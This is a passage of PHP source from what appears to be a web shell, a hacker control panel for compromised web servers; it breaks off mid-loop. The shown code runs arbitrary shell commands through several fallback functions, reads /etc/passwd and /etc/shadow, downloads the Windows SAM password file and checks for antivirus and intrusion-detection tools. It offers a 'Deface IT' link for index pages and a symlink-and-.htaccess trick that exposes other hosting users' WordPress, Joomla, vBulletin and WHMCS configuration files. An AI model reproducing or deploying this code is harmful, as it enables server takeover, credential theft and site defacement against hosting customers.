1781 $info = 'u';
1782 }
1783
1784 // Owner
1785 $info .= (($perms & 0x0100) ? 'r' : '-');
1786 $info .= (($perms & 0x0080) ? 'w' : '-');
1787 $info .= (($perms & 0x0040) ?
1788 (($perms & 0x0800) ? 's' : 'x' ) :
1789 (($perms & 0x0800) ? 'S' : '-'));
1790
1791 // Group
1792 $info .= (($perms & 0x0020) ? 'r' : '-');
1793 $info .= (($perms & 0x0010) ? 'w' : '-');
1794 $info .= (($perms & 0x0008) ?
1795 (($perms & 0x0400) ? 's' : 'x' ) :
1796 (($perms & 0x0400) ? 'S' : '-'));
1797
1798 // World
1799 $info .= (($perms & 0x0004) ? 'r' : '-');
1800 $info .= (($perms & 0x0002) ? 'w' : '-');
1801 $info .= (($perms & 0x0001) ?
1802 (($perms & 0x0200) ? 't' : 'x' ) :
1803 (($perms & 0x0200) ? 'T' : '-'));
1804
1805 return $info;
1806}
1807 function filepermscolor($filename)
1808 {
1809 if(!@is_readable($filename))
1810 return "<font class=readperm>".getFilePermissions($filename)."</font>";
1811 else if(!@is_writable($filename))
1812 return "<font class=noperm>".getFilePermissions($filename)."</font>";
1813 else
1814 return "<font class=wrtperm>".getFilePermissions($filename)."</font>";
1815 }
1816
1817 function yourip()
1818 {
1819 echo $_SERVER["REMOTE_ADDR"];
1820 }
1821 function phpver()
1822 {
1823 $pv=@phpversion();
1824 echo $pv;
1825 }
1826 function magic_quote()
1827 {
1828 echo get_magic_quotes_gpc()?"<font class=txt>ON</font>":"OFF";
1829 }
1830 function serverip()
1831 {
1832 echo @gethostbyname($_SERVER["HTTP_HOST"]);
1833 }
1834 function serverport()
1835 {
1836 echo $_SERVER['SERVER_PORT'];
1837 }
1838 function safe()
1839 {
1840 global $sm;
1841 return $sm?"ON :( :'( (Most of the Features will Not Work!)":"OFF";
1842 }
1843 function serveradmin()
1844 {
1845 echo $_SERVER['SERVER_ADMIN'];
1846 }
1847 function systeminfo()
1848 {
1849 echo php_uname();
1850 }
1851 function curlinfo()
1852 {
1853 echo function_exists('curl_version')?("<font class=txt>Enabled</font>"):("Disabled");
1854 }
1855 function oracleinfo()
1856 {
1857 echo function_exists('ocilogon')?("<font class=txt>Enabled</font>"):("Disabled");
1858 }
1859 function mysqlinfo()
1860 {
1861 echo function_exists('mysql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1862 }
1863 function mssqlinfo()
1864 {
1865 echo function_exists('mssql_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1866 }
1867 function postgresqlinfo()
1868 {
1869 echo function_exists('pg_connect')?("<font class=txt>Enabled</font>"):("Disabled");
1870 }
1871 function softwareinfo()
1872 {
1873 echo getenv("SERVER_SOFTWARE");
1874 }
1875 function download()
1876 {
1877 $frd=$_GET['download'];
1878 $prd=explode("/",$frd);
1879 for($i=0;$i<sizeof($prd);$i++)
1880 {
1881 $nfd=$prd[$i];
1882 }
1883 @ob_clean();
1884 header("Content-type: application/octet-stream");
1885 header("Content-length: ".filesize($nfd));
1886 header("Content-disposition: attachment; filename=\"".$nfd."\";");
1887 readfile($nfd);
1888
1889 exit;
1890
1891 }
1892
1893 function HumanReadableFilesize($size)
1894 {
1895 $mod = 1024;
1896 $units = explode(' ','B KB MB GB TB PB');
1897 for ($i = 0; $size > $mod; $i++)
1898 {
1899 $size /= $mod;
1900 }
1901 return round($size, 2) . ' ' . $units[$i];
1902 }
1903
1904 function showDrives()
1905 {
1906 global $self;
1907 foreach(range('A','Z') as $drive)
1908 {
1909 if(is_dir($drive.':\\'))
1910 {
1911 $myd = $drive.":\\";
1912 ?>
1913 <a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($myd); ?>')">
1914 <?php echo $myd; ?>
1915 </a>
1916 <?php
1917 }
1918 }
1919 }
1920 function diskSpace()
1921 {
1922 global $dir;
1923 return disk_total_space($dir);
1924 }
1925 function freeSpace()
1926 {
1927 global $dir;
1928 return disk_free_space($dir);
1929 }
1930
1931 function thiscmd($p)
1932 {
1933 $path = myexe('which ' . $p);
1934 if(!empty($path))
1935 return $path;
1936 return false;
1937 }
1938
1939 function mysecinfo()
1940 {
1941 function myparam($n, $v)
1942 {
1943 $v = trim($v);
1944 if($v)
1945 {
1946 echo '<span><font size=3>' . $n . ': </font></span>';
1947 if(strpos($v, "\n") === false)
1948 echo '<font class=txt size=3>' . $v . '</font><br>';
1949 else
1950 echo '<pre class=ml1><font class=txt size=3>' . $v . '</font></pre>';
1951 }
1952 }
1953
1954 myparam('Server software', @getenv('SERVER_SOFTWARE'));
1955 if(function_exists('apache_get_modules'))
1956 myparam('Loaded Apache modules', implode(', ', apache_get_modules()));
1957 myparam('Open base dir', @ini_get('open_basedir'));
1958 myparam('Safe mode exec dir', @ini_get('safe_mode_exec_dir'));
1959 myparam('Safe mode include dir', @ini_get('safe_mode_include_dir'));
1960 $temp=array();
1961 if(function_exists('mysql_get_client_info'))
1962 $temp[] = "MySql (".mysql_get_client_info().")";
1963 if(function_exists('mssql_connect'))
1964 $temp[] = "MSSQL";
1965 if(function_exists('pg_connect'))
1966 $temp[] = "PostgreSQL";
1967 if(function_exists('oci_connect'))
1968 $temp[] = "Oracle";
1969 myparam('Supported databases', implode(', ', $temp));
1970 echo '<br>';
1971
1972 if($GLOBALS['os'] == 'Linux') {
1973 myparam('Distro : ', myexe("cat /etc/*-release"));
1974 myparam('Readable /etc/passwd', @is_readable('/etc/passwd')?"yes <a href=javascript:void(0) onClick=\"getmydata('passwd')\">[view]</a>":'no');
1975 myparam('Readable /etc/shadow', @is_readable('/etc/shadow')?"yes <a href=javascript:void(0) onClick=\"getmydata('shadow')\">[view]</a>":'no');
1976 myparam('OS version', @file_get_contents('/proc/version'));
1977 myparam('Distro name', @file_get_contents('/etc/issue.net'));
1978 myparam('Where is Perl?', myexe('whereis perl'));
1979 myparam('Where is Python?', myexe('whereis python'));
1980 myparam('Where is gcc?', myexe('whereis gcc'));
1981 myparam('Where is apache?', myexe('whereis apache'));
1982 myparam('CPU?', myexe('cat /proc/cpuinfo'));
1983 myparam('RAM', myexe('free -m'));
1984 myparam('Mount options', myexe('cat /etc/fstab'));
1985 myparam('User Limits', myexe('ulimit -a'));
1986
1987
1988 if(!$GLOBALS['safe_mode']) {
1989 $userful = array('gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzip2','nc','locate','suidperl');
1990 $danger = array('kav','nod32','bdcored','uvscan','sav','drwebd','clamd','rkhunter','chkrootkit','iptables','ipfw','tripwire','shieldcc','portsentry','snort','ossec','lidsadm','tcplodg','sxid','logcheck','logwatch','sysmask','zmbscap','sawmill','wormscan','ninja');
1991 $downloaders = array('wget','fetch','lynx','links','curl','get','lwp-mirror');
1992 echo '<br>';
1993 $temp=array();
1994 foreach ($userful as $item)
1995 if(thiscmd($item))
1996 $temp[] = $item;
1997 myparam('Userful', implode(', ',$temp));
1998 $temp=array();
1999 foreach ($danger as $item)
2000 if(thiscmd($item))
2001 $temp[] = $item;
2002 myparam('Danger', implode(', ',$temp));
2003 $temp=array();
2004 foreach ($downloaders as $item)
2005 if(thiscmd($item))
2006 $temp[] = $item;
2007 myparam('Downloaders', implode(', ',$temp));
2008 echo '<br/>';
2009 myparam('HDD space', myexe('df -h'));
2010 myparam('Hosts', @file_get_contents('/etc/hosts'));
2011
2012 }
2013 } else {
2014 $repairsam = addslashes($_SERVER["WINDIR"]."\\repair\\sam");
2015 $hostpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\hosts");
2016 $netpath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\\networks");
2017 $sampath = addslashes($_SERVER["WINDIR"]."\system32\drivers\etc\lmhosts.sam");
2018 echo "<font size=3>Password File : </font><a href=".$_SERVER['PHP_SELF']."?download=" . $repairsam ."><b><font class=txt size=3>Download password file</font></b></a><br>";
2019 echo "<font size=3>Config Files : </font><a href=javascript:void(0) onClick=\"fileaction('open','$hostpath')\"><b><font class=txt size=3>[ Hosts ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$netpath')\"><b><font class=txt size=3>[ Local Network Map ]</font></b></a> <a href=javascript:void(0) onClick=\"fileaction('open','$sampath')\"><b><font class=txt size=3>[ lmhosts ]</font></b></a><br>";
2020 $base = (ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"ON":"OFF";
2021 echo "<font size=3>Open Base Dir : </font><font class=txt size=3>" . $base . "</font><br>";
2022 myparam('OS Version',myexe('ver'));
2023 myparam('Account Settings',myexe('net accounts'));
2024 myparam('User Accounts',myexe('net user'));
2025 }
2026 echo '</div>';
2027 }
2028
2029
2030
2031 function myexe($in)
2032 {
2033 $out = '';
2034 if (function_exists('exec')) {
2035 @exec($in,$out);
2036 $out = @join("\n",$out);
2037 } elseif (function_exists('passthru')) {
2038 ob_start();
2039 @passthru($in);
2040 $out = ob_get_clean();
2041 } elseif (function_exists('system')) {
2042 ob_start();
2043 @system($in);
2044 $out = ob_get_clean();
2045 } elseif (function_exists('shell_exec')) {
2046 $out = shell_exec($in);
2047 } elseif (is_resource($f = @popen($in,"r"))) {
2048 $out = "";
2049 while(!@feof($f))
2050 $out .= fread($f,1024);
2051 pclose($f);
2052 }
2053 return $out;
2054}
2055function exec_all($command)
2056 {
2057
2058 $output = '';
2059 if(function_exists('exec'))
2060 {
2061 exec($command,$output);
2062 $output = join("\n",$output);
2063 }
2064
2065 else if(function_exists('shell_exec'))
2066 {
2067 $output = shell_exec($command);
2068 }
2069
2070 else if(function_exists('popen'))
2071 {
2072 $handle = popen($command , "r"); // Open the command pipe for reading
2073 if(is_resource($handle))
2074 {
2075 if(function_exists('fread') && function_exists('feof'))
2076 {
2077 while(!feof($handle))
2078 {
2079 $output .= fread($handle, 512);
2080 }
2081 }
2082 else if(function_exists('fgets') && function_exists('feof'))
2083 {
2084 while(!feof($handle))
2085 {
2086 $output .= fgets($handle,512);
2087 }
2088
2089
2090
2091 }
2092 }
2093 pclose($handle);
2094 }
2095
2096
2097 else if(function_exists('system'))
2098 {
2099 ob_start(); //start output buffering
2100 system($command);
2101 $output = ob_get_contents(); // Get the ouput
2102 ob_end_clean(); // Stop output buffering
2103 }
2104
2105 else if(function_exists('passthru'))
2106 {
2107 ob_start(); //start output buffering
2108 passthru($command);
2109 $output = ob_get_contents(); // Get the ouput
2110 ob_end_clean(); // Stop output buffering
2111 }
2112
2113 else if(function_exists('proc_open'))
2114 {
2115 $descriptorspec = array(
2116 1 => array("pipe", "w"), // stdout is a pipe that the child will write to
2117 );
2118 $handle = proc_open($command ,$descriptorspec , $pipes); // This will return the output to an array 'pipes'
2119 if(is_resource($handle))
2120 {
2121 if(function_exists('fread') && function_exists('feof'))
2122 {
2123 while(!feof($pipes[1]))
2124 {
2125 $output .= fread($pipes[1], 512);
2126 }
2127 }
2128 else if(function_exists('fgets') && function_exists('feof'))
2129 {
2130 while(!feof($pipes[1]))
2131 {
2132 $output .= fgets($pipes[1],512);
2133 }
2134 }
2135 }
2136 pclose($handle);
2137 }
2138
2139 return(htmlspecialchars($output));
2140
2141}
2142
2143$basedir=(ini_get("open_basedir") or strtoupper(ini_get("open_basedir"))=="ON")?"<font class=txt>ON</font>":"OFF";
2144$etc_passwd=@is_readable("/etc/passwd")?"Yes":"No";
2145
2146function getOGid($value)
2147{
2148 if(!function_exists('posix_getegid')) {
2149 $user = @get_current_user();
2150 $uid = @getmyuid();
2151 $gid = @getmygid();
2152 $group = "?";
2153 $owner = $uid . "/". $gid;
2154 return $owner;
2155 } else {
2156 $name=@posix_getpwuid(@fileowner($value));
2157 $group=@posix_getgrgid(@filegroup($value));
2158 $owner = $name['name']. " / ". $group['name'];
2159 return $owner;
2160 }
2161}
2162if(!function_exists("scandir"))
2163{
2164 function scandir($dir) {
2165 $dh = opendir($dir);
2166 while (false !== ($filename = readdir($dh)))
2167 $files[] = $filename;
2168 return $files;
2169 }
2170}
2171function mainfun($dir)
2172{
2173 global $ind, $directorysperator,$os;
2174
2175 $mydir = basename(dirname(__FILE__));
2176 $pdir = str_replace($mydir,"",$dir);
2177 $pdir = str_replace("/","",$dir);
2178
2179 $files = array();
2180 $dirs = array();
2181
2182 $odir=opendir($dir);
2183 while($file = readdir($odir))
2184 {
2185 if(is_dir($dir.'/'.$file))
2186 {
2187 $dirs[]=$file;
2188 }
2189 else
2190 {
2191 $files[]=$file;
2192 }
2193 }
2194 $countfiles = count($dirs) + count($files);
2195 $dircount = count($dirs);
2196 $dircount = $dircount-2;
2197 $myfiles = array_merge($dirs,$files);
2198 $i = 0;
2199 if(is_dir($dir))
2200 {
2201 if(scandir($dir) === false)
2202 echo "<center><font size=3>Directory isn't readable</font></center>";
2203 else
2204 {
2205?><form method="post" id="myform" name="myform">
2206 <table id="maintable" style="width:100%;" align="center" cellpadding="3">
2207 <tr><td colspan="7"><center><div id="showmydata"></div></center></td></tr>
2208 <tr><td colspan="8" align="center"><font size="3">Listing folder <?php echo $dir; ?></font> (<?php echo $dircount.' Dirs And '.count($files).' Files'; ?>)</td>
2209 <tr height:12px;">
2210 <th>Name</th>
2211 <th>Size</th>
2212 <th>Permissions</th>
2213 <?php if($os != "Windows"){ echo "<th>Owner / Group</th>"; } ?>
2214 <th>Modification Date</th>
2215 <th>Rename</th>
2216 <th>Download</th>
2217 <th style="width:2%;">Action</th>
2218 </tr>
2219 <?php
2220 foreach($myfiles as $val)
2221 {
2222 $vv = addslashes($dir . $directorysperator . $val);
2223 $i++;
2224 if($val == ".")
2225 {
2226 ?><tr class=lines><td><a href=javascript:void(0) onClick="changedir('dir','<?php echo addslashes($dir); ?>')"><font class=txt>[ . ]</font></a></td><td><font size=2>CURDIR</font></td>
2227 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir); ?></a></td>
2228
2229 <?php if($os != 'Windows')
2230 {
2231 echo "<td align=center><font size=2>";
2232 echo getOGid($dir)."</font></td>";
2233 }
2234 ?>
2235
2236 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($vv)); ?></font></td>
2237 <td></td><td></td><td></td></</tr><?php
2238
2239 }
2240 else if($val == "..")
2241 {
2242 $val = Trail($dir . $directorysperator . $val,$directorysperator);
2243 $vv = addslashes($val);
2244 if(empty($vv))
2245 $vv = "/"; ?>
2246 <tr class=lines><td class='info'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')"><font class=txt>[ .. ]</font></a></td><td><font size=2>UPDIR</font></td>
2247 <td><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($val); ?></a></td>
2248 <?php if($os != 'Windows')
2249 {
2250 echo "<td align=center><font size=2>";
2251 echo getOGid($val)."</font></td>";
2252
2253 } ?>
2254 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($val)); ?></font></td>
2255 <td></td><td></td><td></td></tr><?php continue;
2256 }
2257 }
2258 foreach($myfiles as $val)
2259 {
2260 $vv = addslashes($dir . $directorysperator . $val);
2261 $i++;
2262
2263 if(is_dir($vv))
2264 {
2265 if($val == "." || $val == "..")
2266 continue; ?>
2267 <tr class=lines>
2268 <td class='dir'><a href=javascript:void(0) onClick="changedir('dir','<?php echo $vv; ?>')">[ <?php echo $val; ?> ]</a></td>
2269 <td class='info'><font size=2>DIR</font></td>
2270
2271 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2272 <?php if($os != 'Windows')
2273 {
2274 echo "<td align=center><font size=2>";
2275 echo getOGid($val)."</font></td>";
2276 } ?>
2277 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2278 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2279 <td></td>
2280 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2281 </tr></font>
2282 <?php
2283 }
2284 else if(is_file($vv))
2285 {
2286 ?>
2287 <tr class=lines>
2288 <td class='file'><a href=javascript:void(0) onClick="fileaction('open','<?php echo $vv; ?>')"><?php if(("/" .$val == $_SERVER["SCRIPT_NAME"]) || ($val == "index.php") || ($val == "index.html") || ($val == "config.php") || ($val == "wp-config.php")) { echo "<font color=red>". $val . "</font>"; } else { echo $val; } ?></a> <?php if($val == "index.php" || $val == "index.html") { if(strlen($ind) != 0) { echo "<a href=javascript:void(0) onClick=\"defacefun('$vv')\"><font color=red>( Deface IT )</font></a>"; } } ?></td>
2289
2290 <td class='info'><font size=2><?php echo HumanReadableFilesize(filesize($dir . $directorysperator . $val));?></font></td>
2291
2292 <td class='info'><a href=javascript:void(0) onClick="fileaction('perms','<?php echo $vv; ?>')"><?php echo filepermscolor($dir . $directorysperator . $val); ?></a></td>
2293
2294 <?php if($os != 'Windows')
2295 {
2296 echo "<td align=center><font size=2>";
2297 echo getOGid($val)."</font></td>";
2298 } ?>
2299 <td align="center"><font class=txt><?php echo date('Y-m-d H:i:s', @filemtime($dir . $directorysperator . $val)); ?></font></td>
2300
2301 <td class="info"><a href=javascript:void(0) onClick="fileaction('rename','<?php echo $vv; ?>')"><font size=2>Rename</font></a></td>
2302 <td class="info"><a href="<?php echo $self;?>?download=<?php echo $dir . $directorysperator .$val;?>"><font size=2>Download</font></a>
2303 <td class="info" align="center"><input type="checkbox" name="actbox[]" id="actbox<?php echo $i; ?>" value="<?php echo $dir . $directorysperator . $val;?>"></td>
2304 </tr>
2305 <p>
2306 <?php
2307 }
2308 }
2309
2310 echo "</table>
2311<div align='right' style='width:100%;' id=maindiv><BR><label><input type='checkbox' name='checkall' onclick='checkedAll();'> <font class=txt size=3>Check All </font></label>
2312<select class=sbox name=choice style='width: 100px;'>
2313 <option value=delete>Delete</option>
2314 <option value=chmod>Change mode</option>
2315 if(class_exists('ZipArchive'))
2316 { <option value=compre>Compress</option>
2317 <option value=uncompre>Uncompress</option> }
2318 </select>
2319
2320 <input type=button onClick=\"myaction(choice.value)\" value=Submit name=checkoption class=but></form></div>";
2321 }}
2322 else
2323 {
2324 echo "<p><font size=3>".$_GET['dir']." is <b>NOT</b> a Valid Directory!<br /></font></p>";
2325 }
2326
2327}
2328if(isset($_REQUEST["script"]))
2329{
2330 $getpath = trim(dirname($_SERVER['SCRIPT_NAME']) . PHP_EOL);
2331 ?>
2332 <center><table><tr><td><a href=javascript:void(0) onClick="getdata('scserver')"><font class=txt size="4">| Use Server |</font></a></td>
2333 <td><a href=javascript:void(0) onClick="getdata('scphp')"><font class=txt size="4">| Use PHP |</font></a></td>
2334 </tr></table></center>
2335 <?php
2336}
2337elseif(isset($_REQUEST["scserver"]))
2338{
2339 ?><center><table><tr><td><a href=javascript:void(0) onClick="getdata('servermanuallyscript')"><font class=txt size="4">| Do It Manually |</font></a></td>
2340 <td><a href=javascript:void(0) onClick="getdata('serverscriptlocator')"><font class=txt size="4">| Do It Automatically |</font></a></td>
2341 </tr></table></center><?php
2342}
2343else if(isset($_REQUEST['servermanuallyscript']))
2344{
2345 ?>
2346 <center>
2347 <form action="<?php echo $self; ?>" method="post">
2348 <textarea class="box" rows="16" cols="100" name="passwd"></textarea><br>
2349 <input type="button" OnClick="manuallyscriptfn('serverscriptlocator',passwd.value)" value="Get Config" class="but">
2350 </form>
2351 </center>
2352 <?php
2353}
2354elseif(isset($_REQUEST['serverscriptlocator']))
2355{
2356 if($os != "Windows")
2357 {
2358 $url = 'http://'.$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI'];
2359 $path=explode('/',$url);
2360 $url =str_replace($path[count($path)-1],'',$url);
2361 if(isset($_REQUEST['passwd']))
2362 {
2363 $getetc = trim($_REQUEST['passwd']);
2364
2365 mkdir("dhanushSPT");
2366 chdir("dhanushSPT");
2367
2368 $myfile = fopen("test.txt","w");
2369
2370 fputs($myfile,$getetc);
2371 fclose($myfile);
2372 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Username</font></td><td align=center><font size=4 >Script</font></td></tr>";
2373 $file = fopen("test.txt", "r") or exit("Unable to open file!");
2374 while(!feof($file))
2375 {
2376 $s = fgets($file);
2377 $matches = array();
2378 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2379 $matches = str_replace("home/","",$matches[1]);
2380 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2381 $headers=get_headers($hs_status);
2382 if(strpos($headers[0],'200') == true )
2383 $hs_script = "Wordpress";
2384 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2385 $headers=get_headers($hs_status);
2386 if(strpos($headers[0],'200') == true )
2387 $hs_script = "Wordpress";
2388 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2389 $headers=get_headers($hs_status);
2390 if(strpos($headers[0],'200') == true )
2391 $hs_script = "Joomla";
2392 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2393 $headers=get_headers($hs_status);
2394 if(strpos($headers[0],'200') == true )
2395 $hs_script = "Vbulletin";
2396 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2397 $headers=get_headers($hs_status);
2398 if(strpos($headers[0],'200') == true )
2399 $hs_script = "Vbulletin";
2400 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2401 $headers=get_headers($hs_status);
2402 if(strpos($headers[0],'200') == true )
2403 $hs_script = "Mybb";
2404 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2405 $headers=get_headers($hs_status);
2406 if(strpos($headers[0],'200') == true )
2407 $hs_script = "IPB";
2408 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2409 $headers=get_headers($hs_status);
2410 if(strpos($headers[0],'200') == true )
2411 $hs_script = "SMF";
2412 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2413 $headers=get_headers($hs_status);
2414 if(strpos($headers[0],'200') == true )
2415 $hs_script = "WHMCS";
2416 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2417 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2418 $dcount++;
2419 }
2420 echo "</table>";
2421 fclose($file);
2422 unlink("test.txt");
2423 }
2424 else
2425 {
2426 $d0mains = @file("/etc/named.conf");
2427 if($d0mains)
2428 {
2429 @mkdir("dhanush",0777);
2430 @chdir("dhanush");
2431 execmd("ln -s / root");
2432 $file3 = 'Options all
2433 DirectoryIndex Sux.html
2434 AddType text/plain .php
2435 AddHandler server-parsed .php
2436 AddType text/plain .html
2437
2438
2439
2440 AddHandler txt .html
2441 Require None
2442 Satisfy Any
2443 ';
2444 $fp3 = fopen('.htaccess','w');
2445 $fw3 = fwrite($fp3,$file3);
2446 @fclose($fp3);
2447 echo "<table align=center border=1 style='width:60%;border-color:#333333;'><tr><td align=center><font size=4 >S. No.</font></td><td align=center><font size=4 >Site</font></td><td align=center><font size=4 >Script</font></td></tr>";
2448 $dcount = 1;
2449 foreach($d0mains as $d0main)
2450 {
2451 if(eregi("zone",$d0main))
2452 {
2453 preg_match_all('#zone "(.*)"#', $d0main, $domains);
2454 flush();
2455
2456 if(strlen(trim($domains[1][0])) > 2)
2457 {
2458 $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
2459 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/wp-config.php";
2460 $headers=get_headers($hs_status);
2461 if(strpos($headers[0],'200') == true )
2462 $hs_script = "Wordpress";
2463 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/blog/wp-config.php";
2464 $headers=get_headers($hs_status);
2465 if(strpos($headers[0],'200') == true )
2466 $hs_script = "Wordpress";
2467 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/configuration.php";
2468 $headers=get_headers($hs_status);
2469 if(strpos($headers[0],'200') == true )
2470 $hs_script = "Joomla";
2471 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/forum/includes/config.php";
2472 $headers=get_headers($hs_status);
2473 if(strpos($headers[0],'200') == true )
2474 $hs_script = "Vbulletin";
2475 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/core/includes/config.php";
2476 $headers=get_headers($hs_status);
2477 if(strpos($headers[0],'200') == true )
2478 $hs_script = "Vbulletin";
2479 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/inc/config.php";
2480 $headers=get_headers($hs_status);
2481 if(strpos($headers[0],'200') == true )
2482 $hs_script = "Mybb";
2483 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/conf_global.php";
2484 $headers=get_headers($hs_status);
2485 if(strpos($headers[0],'200') == true )
2486 $hs_script = "IPB";
2487 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/settings.php";
2488 $headers=get_headers($hs_status);
2489 if(strpos($headers[0],'200') == true )
2490 $hs_script = "SMF";
2491 $hs_status=$url."dhanush/root/home/".$user['name']."/public_html/submitticket.php";
2492 $headers=get_headers($hs_status);
2493 if(strpos($headers[0],'200') == true )
2494 $hs_script = "WHMCS";
2495 echo "<tr align=center><td><font class=txt>" . $dcount . "</font></td><td><a href=".$domains[1][0]." target='_blank'><font class=txt>".$domains[1][0]."</font></a></td><td><font class=txt><a href=".$hs_status." target=_blank>".$hs_user."</a></font></td></tr>"; flush();
2496
2497 $dcount++;
2498 }
2499 }
2500
2501 }
2502 echo "</table>";
2503 }
2504 else
2505 {
2506 $TEST=@file('/etc/passwd');
2507 if ($TEST)
2508 {
2509 @mkdir("dhanush",0777);
2510 @chdir("dhanush");
2511 execmd("ln -s / root");
2512 $file3 = 'Options all
2513 DirectoryIndex Sux.html
2514 AddType text/plain .php
2515 AddHandler server-parsed .php
2516 AddType text/plain .html
2517 AddHandler txt .html
2518 Require None
2519 Satisfy Any
2520 ';
2521 $fp3 = fopen('.htaccess','w');
2522 $fw3 = fwrite($fp3,$file3);
2523 @fclose($fp3);
2524
2525 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2526
2527 $dcount = 1;
2528 $file = fopen("/etc/passwd", "r");
2529 //Output a line of the file until the end is reached
2530 while(!feof($file))
2531 {
2532 $s = fgets($file);
2533 $matches = array();
2534 $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
2535 $matches = str_replace("home/","",$matches[1]);
2536 $hs_status=$url."dhanush/root/home/".$matches."/public_html/wp-config.php";
2537 $headers=get_headers($hs_status);
2538 if(strpos($headers[0],'200') == true )
2539 $hs_script = "Wordpress";
2540 $hs_status=$url."dhanush/root/home/".$matches."/public_html/blog/wp-config.php";
2541 $headers=get_headers($hs_status);
2542 if(strpos($headers[0],'200') == true )
2543 $hs_script = "Wordpress";
2544 $hs_status=$url."dhanush/root/home/".$matches."/public_html/configuration.php";
2545 $headers=get_headers($hs_status);
2546 if(strpos($headers[0],'200') == true )
2547 $hs_script = "Joomla";
2548 $hs_status=$url."dhanush/root/home/".$matches."/public_html/forum/includes/config.php";
2549 $headers=get_headers($hs_status);
2550 if(strpos($headers[0],'200') == true )
2551 $hs_script = "Vbulletin";
2552 $hs_status=$url."dhanush/root/home/".$matches."/public_html/core/includes/config.php";
2553 $headers=get_headers($hs_status);
2554 if(strpos($headers[0],'200') == true )
2555 $hs_script = "Vbulletin";
2556 $hs_status=$url."dhanush/root/home/".$matches."/public_html/inc/config.php";
2557 $headers=get_headers($hs_status);
2558 if(strpos($headers[0],'200') == true )
2559 $hs_script = "Mybb";
2560 $hs_status=$url."dhanush/root/home/".$matches."/public_html/conf_global.php";
2561 $headers=get_headers($hs_status);
2562 if(strpos($headers[0],'200') == true )
2563 $hs_script = "IPB";
2564 $hs_status=$url."dhanush/root/home/".$matches."/public_html/settings.php";
2565 $headers=get_headers($hs_status);
2566 if(strpos($headers[0],'200') == true )
2567 $hs_script = "SMF";
2568 $hs_status=$url."dhanush/root/home/".$matches."/public_html/submitticket.php";
2569 $headers=get_headers($hs_status);
2570 if(strpos($headers[0],'200') == true )
2571 $hs_script = "WHMCS";
2572 echo "<tr><td align=center><font >" . $dcount . "</td><td align=center><font class=txt>" . $matches . "</td>";
2573 echo "<td align=center><font class=txt><a href=".$hs_status." target='_blank'>".$hs_script."</a></td></tr>";
2574 $dcount++;
2575 }
2576 fclose($file);
2577
2578 echo "</table>";
2579 }
2580 else
2581 {
2582 @mkdir("dhanush",0777);
2583 @chdir("dhanush");
2584 execmd("ln -s / root");
2585 $file3 = 'Options all
2586 DirectoryIndex Sux.html
2587 AddType text/plain .php
2588 AddHandler server-parsed .php
2589 AddType text/plain .html
2590 AddHandler txt .html
2591 Require None
2592 Satisfy Any
2593 ';
2594 $fp3 = fopen('.htaccess','w');
2595 $fw3 = fwrite($fp3,$file3);
2596 @fclose($fp3);
2597 echo "<table align=center border=1 style='width:40%;' class=tbl><tr><td align=center><font size=4>S. No.</font></td><td align=center><font size=4>Users</font></td><td align=center><font size=4>Script</font></td></tr>";
2598 $temp = "";
2599 $val1 = 0;
2600 $val2 = 1000;
2601 for(;$val1 <= $val2;$val1++)
2602 {
2603 $uid = @posix_getpwuid($val1);
2604 if ($uid)
2605 $temp .= join(':',$uid)."\n";
2606 }
2607 echo '<br/>';
2608 $temp = trim($temp);
2609
2610 $file5 = fopen("test.txt","w");
2611 fputs($file5,$temp);
2612 fclose($file5);
2613
2614 $dcount = 1;
2615 $file = fopen("test.txt", "r");
2616 while(!feof($file))
